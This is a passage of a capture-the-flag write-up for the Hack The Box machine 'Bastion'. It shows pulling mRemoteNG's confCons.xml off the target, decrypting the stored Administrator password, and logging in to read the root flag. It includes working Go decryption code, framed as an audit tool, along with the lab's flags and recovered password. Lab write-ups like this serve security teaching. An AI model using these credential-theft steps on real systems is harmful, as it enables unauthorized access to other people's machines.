l4mpje@BASTION C:\Users\L4mpje\Desktop>ls
'ls' is not recognized as an internal or external command,
operable program or batch file.

l4mpje@BASTION C:\Users\L4mpje\Desktop>dir
 Volume in drive C has no label.
 Volume Serial Number is 0CB3-C487

 Directory of C:\Users\L4mpje\Desktop

22-02-2019  16:27    <DIR>          .
22-02-2019  16:27    <DIR>          ..
23-02-2019  10:07                32 user.txt
               1 File(s)             32 bytes
               2 Dir(s)  11.295.985.664 bytes free

l4mpje@BASTION C:\Users\L4mpje\Desktop>type user.txt
9bfe57d5c3309db3a151772f9d86c6cd

l4mpje@BASTION C:\Users\L4mpje\Desktop>

So we now have the user flag in its usual location, Desktop\user.txt.

Let's try to get root.txt.

Privilege Escalation

Traversing a few directories, we notice something interesting:

l4mpje@BASTION C:\Users\L4mpje\Desktop>cd ..

l4mpje@BASTION C:\Users\L4mpje>cd appdata

l4mpje@BASTION C:\Users\L4mpje\AppData>cd roaming

l4mpje@BASTION C:\Users\L4mpje\AppData\Roaming>dir
 Volume in drive C has no label.
 Volume Serial Number is 0CB3-C487

 Directory of C:\Users\L4mpje\AppData\Roaming

22-02-2019  15:01    <DIR>          .
22-02-2019  15:01    <DIR>          ..
22-02-2019  14:50    <DIR>          Adobe
22-02-2019  15:03    <DIR>          mRemoteNG
               0 File(s)              0 bytes
               4 Dir(s)  11.295.985.664 bytes free

l4mpje@BASTION C:\Users\L4mpje\AppData\Roaming>

mRemoteNG is an interesting entry: it is an open-source fork of mRemote, a remote connection manager, and it saves its
connection information (including stored credentials) in confCons.xml, which we can locate and analyze.

l4mpje@BASTION C:\Users\L4mpje\AppData\Roaming>cd mRemoteNG

l4mpje@BASTION C:\Users\L4mpje\AppData\Roaming\mRemoteNG>dir
 Volume in drive C has no label.
 Volume Serial Number is 0CB3-C487

 Directory of C:\Users\L4mpje\AppData\Roaming\mRemoteNG

22-02-2019  15:03    <DIR>          .
22-02-2019  15:03    <DIR>          ..
22-02-2019  15:03             6.316 confCons.xml
22-02-2019  15:02             6.194 confCons.xml.20190222-1402277353.backup
22-02-2019  15:02             6.206 confCons.xml.20190222-1402339071.backup
22-02-2019  15:02             6.218 confCons.xml.20190222-1402379227.backup
22-02-2019  15:02             6.231 confCons.xml.20190222-1403070644.backup
22-02-2019  15:03             6.319 confCons.xml.20190222-1403100488.backup
22-02-2019  15:03             6.318 confCons.xml.20190222-1403220026.backup
22-02-2019  15:03             6.315 confCons.xml.20190222-1403261268.backup
22-02-2019  15:03             6.316 confCons.xml.20190222-1403272831.backup
22-02-2019  15:03             6.315 confCons.xml.20190222-1403433299.backup
22-02-2019  15:03             6.316 confCons.xml.20190222-1403486580.backup
22-02-2019  15:03                51 extApps.xml
22-02-2019  15:03             5.217 mRemoteNG.log
22-02-2019  15:03             2.245 pnlLayout.xml
22-02-2019  15:01    <DIR>          Themes
              14 File(s)         76.577 bytes
               3 Dir(s)  11.295.985.664 bytes free

l4mpje@BASTION C:\Users\L4mpje\AppData\Roaming\mRemoteNG>

Let's use scp to pull confCons.xml to our machine.

┌──(abhinav㉿ETHICALHACKX)-[~/htb/basiton]
└─$ scp l4mpje@bastion.htb:/Users/L4mpje/AppData/Roaming/mRemoteNG/confCons.xml .
l4mpje@bastion.htb's password:
confCons.xml                                  100% 6316    38.2KB/s   00:00

┌──(abhinav㉿ETHICALHACKX)-[~/htb/basiton]
└─$ cat confCons.xml
<?xml version="1.0" encoding="utf-8"?>
<mrng:Connections xmlns:mrng="http://mremoteng.org" Name="Connections" Export="false" EncryptionEngine="AES" BlockCipherMode="GCM" KdfIterations="1000" FullFileEncryption="false" Protected="ZSvKI7j224Gf/twXpaP5G2QFZMLr1iO1f5JKdtIKL6eUg+eWkL5tKO886au0ofFPW0oop8R8ddXKAx4KK7sAk6AA" ConfVersion="2.6">
    <Node Name="DC" Type="Connection" Descr="" Icon="mRemoteNG" Panel="General" Id="500e7d58-662a-44d4-aff0-3a4f547a3fee" Username="Administrator" Domain="" Password="aEWNFV5uGcjUHF0uS17QTdT9kVqtKCPeoC0Nw5dmaPFjNQ2kt/zO5xDqE4HdVmHAowVRdC7emf7lWWA10dQKiw==" Hostname="127.0.0.1" Protocol="RDP" PuttySession="Default Settings" Port="3389" ConnectToConsole="false" UseCredSsp="true" RenderingEngine="IE" ICAEncryptionStrength="EncrBasic" RDPAuthenticationLevel="NoAuth" RDPMinutesToIdleTimeout="0" RDPAlertIdleTimeout="false" LoadBalanceInfo="" Colors="Colors16Bit" Resolution="FitToWindow" AutomaticResize="true" DisplayWallpaper="false" DisplayThemes="false" EnableFontSmoothing="false" EnableDesktopComposition="false" CacheBitmaps="false" RedirectDiskDrives="false" RedirectPorts="false" RedirectPrinters="false" RedirectSmartCards="false" RedirectSound="DoNotPlay" SoundQuality="Dynamic" RedirectKeys="false" Connected="false" PreExtApp="" PostExtApp="" MacAddress="" UserField="" ExtApp="" VNCCompression="CompNone" VNCEncoding="EncHextile" VNCAuthMode="AuthVNC" VNCProxyType="ProxyNone" VNCProxyIP="" VNCProxyPort="0" VNCProxyUsername="" VNCProxyPassword="" VNCColors="ColNormal" VNCSmartSizeMode="SmartSAspect" VNCViewOnly="false" RDGatewayUsageMethod="Never" RDGatewayHostname="" RDGatewayUseConnectionCredentials="Yes" RDGatewayUsername="" RDGatewayPassword="" RDGatewayDomain="" InheritCacheBitmaps="false" InheritColors="false" InheritDescription="false" InheritDisplayThemes="false" InheritDisplayWallpaper="false" InheritEnableFontSmoothing="false" InheritEnableDesktopComposition="false" InheritDomain="false" InheritIcon="false" InheritPanel="false" InheritPassword="false" InheritPort="false" InheritProtocol="false" InheritPuttySession="false" InheritRedirectDiskDrives="false" InheritRedirectKeys="false" InheritRedirectPorts="false" InheritRedirectPrinters="false" InheritRedirectSmartCards="false" InheritRedirectSound="false" InheritSoundQuality="false" InheritResolution="false" InheritAutomaticResize="false" InheritUseConsoleSession="false" InheritUseCredSsp="false" InheritRenderingEngine="false" InheritUsername="false" InheritICAEncryptionStrength="false" InheritRDPAuthenticationLevel="false" InheritRDPMinutesToIdleTimeout="false" InheritRDPAlertIdleTimeout="false" InheritLoadBalanceInfo="false" InheritPreExtApp="false" InheritPostExtApp="false" InheritMacAddress="false" InheritUserField="false" InheritExtApp="false" InheritVNCCompression="false" InheritVNCEncoding="false" InheritVNCAuthMode="false" InheritVNCProxyType="false" InheritVNCProxyIP="false" InheritVNCProxyPort="false" InheritVNCProxyUsername="false" InheritVNCProxyPassword="false" InheritVNCColors="false" InheritVNCSmartSizeMode="false" InheritVNCViewOnly="false" InheritRDGatewayUsageMethod="false" InheritRDGatewayHostname="false" InheritRDGatewayUseConnectionCredentials="false" InheritRDGatewayUsername="false" InheritRDGatewayPassword="false" InheritRDGatewayDomain="false" />
    <Node Name="L4mpje-PC" Type="Connection" Descr="" Icon="mRemoteNG" Panel="General" Id="8d3579b2-e68e-48c1-8f0f-9ee1347c9128" Username="L4mpje" Domain="" Password="yhgmiu5bbuamU3qMUKc/uYDdmbMrJZ/JvR1kYe4Bhiu8bXybLxVnO0U9fKRylI7NcB9QuRsZVvla8esB" Hostname="192.168.1.75" Protocol="RDP" PuttySession="Default Settings" Port="3389" ConnectToConsole="false" UseCredSsp="true" RenderingEngine="IE" ICAEncryptionStrength="EncrBasic" RDPAuthenticationLevel="NoAuth" RDPMinutesToIdleTimeout="0" RDPAlertIdleTimeout="false" LoadBalanceInfo="" Colors="Colors16Bit" Resolution="FitToWindow" AutomaticResize="true" DisplayWallpaper="false" DisplayThemes="false" EnableFontSmoothing="false" EnableDesktopComposition="false" CacheBitmaps="false" RedirectDiskDrives="false" RedirectPorts="false" RedirectPrinters="false" RedirectSmartCards="false" RedirectSound="DoNotPlay" SoundQuality="Dynamic" RedirectKeys="false" Connected="false" PreExtApp="" PostExtApp="" MacAddress="" UserField="" ExtApp="" VNCCompression="CompNone" VNCEncoding="EncHextile" VNCAuthMode="AuthVNC" VNCProxyType="ProxyNone" VNCProxyIP="" VNCProxyPort="0" VNCProxyUsername="" VNCProxyPassword="" VNCColors="ColNormal" VNCSmartSizeMode="SmartSAspect" VNCViewOnly="false" RDGatewayUsageMethod="Never" RDGatewayHostname="" RDGatewayUseConnectionCredentials="Yes" RDGatewayUsername="" RDGatewayPassword="" RDGatewayDomain="" InheritCacheBitmaps="false" InheritColors="false" InheritDescription="false" InheritDisplayThemes="false" InheritDisplayWallpaper="false" InheritEnableFontSmoothing="false" InheritEnableDesktopComposition="false" InheritDomain="false" InheritIcon="false" InheritPanel="false" InheritPassword="false" InheritPort="false" InheritProtocol="false" InheritPuttySession="false" InheritRedirectDiskDrives="false" InheritRedirectKeys="false" InheritRedirectPorts="false" InheritRedirectPrinters="false" InheritRedirectSmartCards="false" InheritRedirectSound="false" InheritSoundQuality="false" InheritResolution="false" InheritAutomaticResize="false" InheritUseConsoleSession="false" InheritUseCredSsp="false" InheritRenderingEngine="false" InheritUsername="false" InheritICAEncryptionStrength="false" InheritRDPAuthenticationLevel="false" InheritRDPMinutesToIdleTimeout="false" InheritRDPAlertIdleTimeout="false" InheritLoadBalanceInfo="false" InheritPreExtApp="false" InheritPostExtApp="false" InheritMacAddress="false" InheritUserField="false" InheritExtApp="false" InheritVNCCompression="false" InheritVNCEncoding="false" InheritVNCAuthMode="false" InheritVNCProxyType="false" InheritVNCProxyIP="false" InheritVNCProxyPort="false" InheritVNCProxyUsername="false" InheritVNCProxyPassword="false" InheritVNCColors="false" InheritVNCSmartSizeMode="false" InheritVNCViewOnly="false" InheritRDGatewayUsageMethod="false" InheritRDGatewayHostname="false" InheritRDGatewayUseConnectionCredentials="false" InheritRDGatewayUsername="false" InheritRDGatewayPassword="false" InheritRDGatewayDomain="false" />
</mrng:Connections>

┌──(abhinav㉿ETHICALHACKX)-[~/htb/basiton]
└─$

Examining confCons.xml, we find the following entry for the Administrator account:

 <Node Name="DC" Type="Connection" Descr="" Icon="mRemoteNG" Panel="General" Id="500e7d58-662a-44d4-aff0-3a4f547a3fee" Username="Administrator" Domain="" Password="aEWNFV5uGcjUHF0uS17QTdT9kVqtKCPeoC0Nw5dmaPFjNQ2kt/zO5xDqE4HdVmHAowVRdC7emf7lWWA10dQKiw==" Hostname="127.0.0.1" Protocol="RDP" PuttySession="Default Settings" Port="3389" ConnectToConsole="false" UseCredSsp="true" RenderingEngine="IE" ICAEncryptionStrength="EncrBasic"

The Password value is base64, but decoding it does not give readable text: mRemoteNG stores connection passwords encrypted (here with AES in GCM mode, as the EncryptionEngine and BlockCipherMode attributes show), and a script that decrypts mRemoteNG passwords is documented for it.

┌──(abhinav㉿ETHICALHACKX)-[~/htb/basiton]
└─$ python3 mremoteNG.py -s "aEWNFV5uGcjUHF0uS17QTdT9kVqtKCPeoC0Nw5dmaPFjNQ2kt/zO5xDqE4HdVmHAowVRdC7emf7lWWA10dQKiw=="
Password: thXLHM96BeKL0ER2
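To see why that works, and to audit your own mRemoteNG files for the same weakness, here is an added stand-alone Go example (not the writeup's script and not mRemoteNG's own code). It assumes mRemoteNG's default master password "mR3m", which is used whenever the user never sets one, and the AES-GCM blob layout of current mRemoteNG versions; the two sample entries are the Node values from the confCons.xml above.

```go
package main

import (
	"crypto/aes"
	"crypto/cipher"
	"crypto/hmac"
	"crypto/sha1"
	"encoding/base64"
	"errors"
)

// DefaultMasterPassword is the master password mRemoteNG uses when the user never sets one (assumption: known default).
const DefaultMasterPassword = "mR3m"

// pbkdf2SHA1 is PBKDF2-HMAC-SHA1 (.NET's Rfc2898DeriveBytes), written out so no third-party module is needed.
func pbkdf2SHA1(pw, salt []byte, iters, n int) []byte {
	mac, out := hmac.New(sha1.New, pw), []byte{}
	for blk := uint32(1); len(out) < n; blk++ {
		mac.Reset()
		mac.Write(salt)
		mac.Write([]byte{byte(blk >> 24), byte(blk >> 16), byte(blk >> 8), byte(blk)})
		u := mac.Sum(nil)
		t := append([]byte(nil), u...)
		for i := 1; i < iters; i++ {
			mac.Reset()
			mac.Write(u)
			u = mac.Sum(nil)
			for j := range t {
				t[j] ^= u[j]
			}
		}
		out = append(out, t...)
	}
	return out[:n]
}

// DecryptPassword opens a Password attribute written with EncryptionEngine="AES" BlockCipherMode="GCM": base64 of
// salt(16) | nonce(16) | ciphertext | tag(16); key = PBKDF2(master, salt, KdfIterations, 32 bytes); salt is also the AAD.
func DecryptPassword(b64, master string, iters int) (string, error) {
	blob, err := base64.StdEncoding.DecodeString(b64)
	if err != nil || len(blob) < 48 {
		return "", errors.New("not a salt|nonce|ciphertext|tag blob")
	}
	salt, nonce, body := blob[:16], blob[16:32], blob[32:]
	block, _ := aes.NewCipher(pbkdf2SHA1([]byte(master), salt, iters, 32)) // 32-byte key, cannot fail
	gcm, _ := cipher.NewGCMWithNonceSize(block, 16)                        // mRemoteNG uses a 128-bit nonce
	pt, err := gcm.Open(nil, nonce, body, salt)                            // wrong master password fails the tag check
	return string(pt), err
}

// AuditDefaultMaster takes connection name -> Password attribute and returns those that open under the default
// master password, i.e. credentials that anyone able to read confCons.xml can recover.
func AuditDefaultMaster(nodes map[string]string, iters int) map[string]string {
	weak := map[string]string{}
	for name, blob := range nodes {
		if pt, err := DecryptPassword(blob, DefaultMasterPassword, iters); err == nil {
			weak[name] = pt
		}
	}
	return weak
}

// SampleNodes are the two Node entries from the confCons.xml above (its KdfIterations="1000").
var SampleNodes = map[string]string{
	"DC":        "aEWNFV5uGcjUHF0uS17QTdT9kVqtKCPeoC0Nw5dmaPFjNQ2kt/zO5xDqE4HdVmHAowVRdC7emf7lWWA10dQKiw==",
	"L4mpje-PC": "yhgmiu5bbuamU3qMUKc/uYDdmbMrJZ/JvR1kYe4Bhiu8bXybLxVnO0U9fKRylI7NcB9QuRsZVvla8esB",
}
```

A connection that shows up in the audit is protected only by a value shipped in every mRemoteNG install; setting a real master password (or not saving passwords at all) is the fix.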

Now we have the Administrator password; let's get the root flag.

┌──(abhinav㉿ETHICALHACKX)-[~/htb/basiton]
└─$ ssh administrator@bastion.htb
administrator@bastion.htb's password:
Microsoft Windows [Version 10.0.14393]
(c) 2016 Microsoft Corporation. All rights reserved.

administrator@BASTION C:\Users\Administrator>dir
 Volume in drive C has no label.
 Volume Serial Number is 0CB3-C487

 Directory of C:\Users\Administrator

25-04-2019  06:08    <DIR>          .
25-04-2019  06:08    <DIR>          ..
23-02-2019  10:40    <DIR>          Contacts
23-02-2019  10:40    <DIR>          Desktop
23-02-2019  10:40    <DIR>          Documents
23-02-2019  10:40    <DIR>          Downloads
23-02-2019  10:40    <DIR>          Favorites
23-02-2019  10:40    <DIR>          Links
23-02-2019  10:40    <DIR>          Music
23-02-2019  10:40    <DIR>          Pictures
23-02-2019  10:40    <DIR>          Saved Games
23-02-2019  10:40    <DIR>          Searches
23-02-2019  10:40    <DIR>          Videos
               0 File(s)              0 bytes
              13 Dir(s)  11.295.739.904 bytes free

administrator@BASTION C:\Users\Administrator>cd desktop

administrator@BASTION C:\Users\Administrator\Desktop>dir
 Volume in drive C has no label.
 Volume Serial Number is 0CB3-C487

 Directory of C:\Users\Administrator\Desktop

23-02-2019  10:40    <DIR>          .
23-02-2019  10:40    <DIR>          ..
23-02-2019  10:07                32 root.txt
               1 File(s)             32 bytes
               2 Dir(s)  11.295.739.904 bytes free

administrator@BASTION C:\Users\Administrator\Desktop>type root.txt
958850b91811676ed6620a9c430e65c8

administrator@BASTION C:\Users\Administrator\Desktop>

We will try to include learning topics for each writeup going forward, and will update this one as well.
